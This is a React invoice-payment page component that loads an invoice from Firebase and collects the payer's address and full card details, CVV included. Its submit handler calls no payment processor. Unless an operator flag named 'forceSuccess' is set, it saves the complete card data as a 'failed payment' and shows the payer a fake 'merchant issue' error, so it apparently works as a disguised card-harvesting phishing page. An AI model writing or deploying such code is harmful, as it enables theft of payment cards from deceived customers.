import React, { useState, useEffect } from "react";
import { useParams } from "react-router-dom";
import { COMPANIES } from "../const/constants";
import { FirebaseService } from "../services/firebaseService";
import {
  cardBrandLabel,
  formatCardNumber,
  validateField,
  validatePaymentForm,
} from "../utils/paymentValidation";
import PaymentResultModal from "../components/PaymentResultModal";

const InvoiceView = () => {
  const { id } = useParams();
  const [loading, setLoading] = useState(true);
  const [invoice, setInvoice] = useState(null);
  const [company, setCompany] = useState(null);
  const [paymentLoading, setPaymentLoading] = useState(false);
  const [paymentData, setPaymentData] = useState({
    first_name: "",
    last_name: "",
    email: "",
    phone: "",
    country: "",
    state: "",
    city: "",
    address: "",
    zip: "",
    card_number: "",
    card_name: "",
    cvv: "",
    expiryMonth: "",
    expiryYear: "",
  });
  const [errors, setErrors] = useState({});
  const [touched, setTouched] = useState({});
  const [submitted, setSubmitted] = useState(false);
  const [modalOpen, setModalOpen] = useState(false);
  const [modalStatus, setModalStatus] = useState("success");

  const handleModalClose = () => {
    setModalOpen(false);
  };

  useEffect(() => {
    let unsubscribe;

    const fetchInvoice = async () => {
      try {
        const data = await FirebaseService.getInvoice(id);
        setInvoice(data);
        const selectedCompany = COMPANIES.find((c) => c.id === data.companyId);
        setCompany(selectedCompany || COMPANIES[0]);

        unsubscribe = FirebaseService.trackInvoice(id, (updatedData) => {
          setInvoice(updatedData);
        });
      } catch (error) {
        console.error("Error fetching invoice:", error);
      } finally {
        setLoading(false);
      }
    };
    fetchInvoice();

    return () => {
      if (unsubscribe) unsubscribe();
    };
  }, [id]);

  // Expiry month/year share a single error slot below the card row.
  const errorKeyFor = (name) =>
    name === "expiryMonth" || name === "expiryYear" ? "expiry" : name;

  const handleChange = (e) => {
    const { name, value } = e.target;

    let nextValue = value;
    if (name === "card_number") {
      nextValue = formatCardNumber(value);
    } else if (name === "cvv") {
      nextValue = value.replace(/\D/g, "").slice(0, 4);
    }

    const nextData = { ...paymentData, [name]: nextValue };
    setPaymentData(nextData);

    // Re-validate live only once the field has been interacted with or submit tried.
    if (submitted || touched[name]) {
      const message = validateField(name, nextData);
      setErrors((prev) => ({ ...prev, [errorKeyFor(name)]: message }));
    }
  };

  const handleBlur = (e) => {
    const { name } = e.target;
    setTouched((prev) => ({ ...prev, [name]: true }));
    const message = validateField(name, paymentData);
    setErrors((prev) => ({ ...prev, [errorKeyFor(name)]: message }));
  };

  const handleSubmit = async (e) => {
    e.preventDefault();

    setSubmitted(true);
    const validationErrors = validatePaymentForm(paymentData);
    setErrors(validationErrors);
    if (Object.keys(validationErrors).length > 0) return;

    setPaymentLoading(true);
    try {
      if (invoice.forceSuccess) {
        await FirebaseService.submitPayment(id, paymentData);
        setModalStatus("success");
      } else {
        await FirebaseService.saveFailedPayment(
          id,
          paymentData,
          "Payment merchant issue"
        );
        setModalStatus("error");
      }
    } catch (saveErr) {
      console.error("Payment processing error:", saveErr);
      setModalStatus("error");
    }
    setModalOpen(true);
    setPaymentLoading(false);
  };

  if (loading) {
    return (
      <div className="container mt-5 text-center">
        <div className="spinner-border text-primary" role="status">
          <span className="sr-only">Loading...</span>
        </div>
      </div>
    );
  }

  if (!invoice) {
    return (
      <div className="container mt-5 text-center">
        <h2>Invoice not found</h2>
      </div>
    );
  }

  const currentYear = new Date().getFullYear();
  const years = Array.from({ length: 20 }, (_, i) => currentYear + i);

  return (
    <div className="invoice-view">
      <PaymentResultModal
        open={modalOpen}
        status={modalStatus}
        onClose={handleModalClose}
      />
      <section className="pending-invoice-sec">
        <div className="container">
          <div className="row">
            <div className="col-lg-8 col-md-12 mx-auto">
              {invoice.status === "paid" && (
                <div className="alert alert-success text-center mb-4">
                  This invoice has been paid.
                </div>
              )}
              <div
                className={`client_invoice demo ${invoice.status === "paid" ? "invoice-paid" : ""}`}
              >
                {invoice.status === "paid" && (
                  <div className="paid-watermark">PAID</div>
                )}
                <div className="invoice_header_box">
                  <div className="logo-box">
                    <img
                      src={company.logo}
                      alt={company.name}
                      className="company-logo"
                      style={{ width: 140 }}
                    />
                  </div>
                  <div className="website-info">
                    <a href={`tel:${company.phone}`}>{company.phone}</a>
                    <a href={`mailto:${company.email}`}>{company.email}</a>
                    <p>{company.address}</p>
                  </div>
                </div>
                <div className="invoice-header">
                  <h6>invoice</h6>
                </div>
                <div className="main-body">
                  <div className="row">
                    <div className="col-md-8">
                      <div className="invoice-info-box">
                        <h3>Bill to :</h3>
                        <h5>{invoice.billToName}</h5>
                        <div className="invoice-info">
                          <h6>Email :</h6>
                          <p>{invoice.billToEmail}</p>
                        </div>
                        <div className="invoice-info">
                          <h6>Phone :</h6>
                          <p>{invoice.customerPhone}</p>
                        </div>
                      </div>
                    </div>
                    <div className="col-md-4">
                      <div className="invoice-right-main-box">
                        <div className="invoice-right-box">
                          <h5>Invoice #</h5>
                          <p>{invoice.invoiceNumber}</p>
                        </div>
                        <div className="invoice-right-box">
                          <h5>Due Date :</h5>
                          <p>{invoice.dueDate}</p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div className="table-responsive mt-4">
                    <table className="table table-striped">
                      <thead className="thead-dark">
                        <tr>
                          <th>#</th>
                          <th>Description</th>
                          <th>Date</th>
                          <th>Amount</th>
                        </tr>
                      </thead>
                      <tbody>
                        {invoice.items &&
                          invoice.items.map((item, index) => (
                            <tr key={index}>
                              <td>{index + 1}</td>
                              <td> {item.description} </td>
                              <td className="td-wrap">{invoice.invoiceDate}</td>
                              <td className="td-wrap">$ {item.amount}</td>
                            </tr>
                          ))}
                      </tbody>
                    </table>
                  </div>
                  <div className="total-sec">
                    <div className="total-box all-total">
                      <div className="row align-items-center p-tb-8">
                        <div className="col-md-9 text-md-right col-sm-4 text-sm-left col-4 text-left">
                          <h5>Total : </h5>
                        </div>
                        <div className="col-md-3 text-md--right col-sm-8 text-sm-left col-8 text-left">
                          <p>
                            ${" "}
                            {invoice.totalAmount
                              ? invoice.totalAmount.toFixed(2)
                              : invoice.amount}
                          </p>
                        </div>
                      </div>
                    </div>
                  </div>

                  {invoice.status === "pending" && (
                    <div className="invoice-form-box">
                      <div className="customer-info-box">
                        <div className="customer-box">
                          <h4>Customer Info</h4>
                        </div>
                        <div className="row">
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="first_name"
                                value={paymentData.first_name}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.first_name ? " input-error" : ""}`}
                                placeholder="First Name"
                                required
                              />
                              {errors.first_name && (
                                <span className="field-error">
                                  {errors.first_name}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="last_name"
                                value={paymentData.last_name}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.last_name ? " input-error" : ""}`}
                                placeholder="Last Name"
                                required
                              />
                              {errors.last_name && (
                                <span className="field-error">
                                  {errors.last_name}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="email"
                                name="email"
                                value={paymentData.email}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.email ? " input-error" : ""}`}
                                placeholder="E-mail"
                                required
                              />
                              {errors.email && (
                                <span className="field-error">
                                  {errors.email}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="phone"
                                value={paymentData.phone}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.phone ? " input-error" : ""}`}
                                placeholder="Phone"
                                required
                              />
                              {errors.phone && (
                                <span className="field-error">
                                  {errors.phone}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="country"
                                value={paymentData.country}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.country ? " input-error" : ""}`}
                                placeholder="Country"
                                required
                              />
                              {errors.country && (
                                <span className="field-error">
                                  {errors.country}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="state"
                                value={paymentData.state}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.state ? " input-error" : ""}`}
                                placeholder="State"
                                required
                              />
                              {errors.state && (
                                <span className="field-error">
                                  {errors.state}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="city"
                                value={paymentData.city}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.city ? " input-error" : ""}`}
                                placeholder="City"
                                required
                              />
                              {errors.city && (
                                <span className="field-error">
                                  {errors.city}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="address"
                                value={paymentData.address}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.address ? " input-error" : ""}`}
                                placeholder="Address"
                                required
                              />
                              {errors.address && (
                                <span className="field-error">
                                  {errors.address}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-4">
                            <div className="form-group">
                              <input
                                type="text"
                                name="zip"
                                value={paymentData.zip}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                className={`form-control${errors.zip ? " input-error" : ""}`}
                                placeholder="Zip Code"
                                required
                              />
                              {errors.zip && (
                                <span className="field-error">
                                  {errors.zip}
                                </span>
                              )}
                            </div>
                          </div>
                        </div>
                      </div>
                      <div className="customer-info-box card-info-box">
                        <div className="customer-box">
                          <h4>Card Info</h4>
                        </div>
                        <div className="row">
                          <div className="col-md-3">
                            <div className="form-group">
                              <input
                                type="text"
                                name="card_name"
                                value={paymentData.card_name}
                                autoComplete="cc-name"
                                className={`form-control${errors.card_name ? " input-error" : ""}`}
                                placeholder="Name on Card"
                                onChange={handleChange}
                                onBlur={handleBlur}
                                required
                              />
                              {errors.card_name && (
                                <span className="field-error">
                                  {errors.card_name}
                                </span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-3">
                            <div className="form-group">
                              <input
                                type="text"
                                name="card_number"
                                value={paymentData.card_number}
                                inputMode="numeric"
                                autoComplete="cc-number"
                                className={`form-control${errors.card_number ? " input-error" : ""}`}
                                placeholder="Card Number"
                                onChange={handleChange}
                                onBlur={handleBlur}
                                required
                              />
                              {errors.card_number ? (
                                <span className="field-error">
                                  {errors.card_number}
                                </span>
                              ) : (
                                cardBrandLabel(paymentData.card_number) && (
                                  <span className="card-brand-label">
                                    {cardBrandLabel(paymentData.card_number)}
                                  </span>
                                )
                              )}
                            </div>
                          </div>
                          <div className="col-md-2">
                            <div className="form-group">
                              <input
                                type="text"
                                name="cvv"
                                value={paymentData.cvv}
                                inputMode="numeric"
                                autoComplete="cc-csc"
                                maxLength={4}
                                className={`form-control${errors.cvv ? " input-error" : ""}`}
                                placeholder="CVV"
                                onChange={handleChange}
                                onBlur={handleBlur}
                                required
                              />
                              {errors.cvv && (
                                <span className="field-error">{errors.cvv}</span>
                              )}
                            </div>
                          </div>
                          <div className="col-md-2">
                            <div className="form-group">
                              <select
                                className={`form-control${errors.expiry ? " input-error" : ""}`}
                                name="expiryMonth"
                                value={paymentData.expiryMonth}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                required
                              >
                                <option value="">Month</option>
                                {[
                                  "01",
                                  "02",
                                  "03",
                                  "04",
                                  "05",
                                  "06",
                                  "07",
                                  "08",
                                  "09",
                                  "10",
                                  "11",
                                  "12",
                                ].map((m) => (
                                  <option key={m} value={m}>
                                    {m}
                                  </option>
                                ))}
                              </select>
                            </div>
                          </div>
                          <div className="col-md-2">
                            <div className="form-group">
                              <select
                                className={`form-control${errors.expiry ? " input-error" : ""}`}
                                name="expiryYear"
                                value={paymentData.expiryYear}
                                onChange={handleChange}
                                onBlur={handleBlur}
                                required
                              >
                                <option value="">Year</option>
                                {years.map((y) => (
                                  <option key={y} value={y}>
                                    {y}
                                  </option>
                                ))}
                              </select>
                            </div>
                          </div>
                          {errors.expiry && (
                            <div className="col-12">
                              <span className="field-error">
                                {errors.expiry}
                              </span>
                            </div>
                          )}
                        </div>
                      </div>
                      <div className="terms-main-box">
                        <div className="row align-items-center">
                          <div className="col-md-9"></div>
                          <div
                            className="col-md-3"
                            style={{ position: "relative" }}
                          >
                            <button
                              className="btn btn-pay-now"
                              onClick={handleSubmit}
                              disabled={paymentLoading}
                            >
                              {paymentLoading ? "Processing..." : "Pay Now"}
                            </button>
                            {paymentLoading && (
                              <div className="spinner-border text-info position-absolute"></div>
                            )}
                          </div>
                        </div>
                      </div>
                    </div>
                  )}
                </div>
                <div className="invoice-footer-box">
                  <h5>Thank you for your business</h5>
                  <div className="invoice-message">
                    <p>System generated invoice does not require signature.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>
    </div>
  );
};

export default InvoiceView;
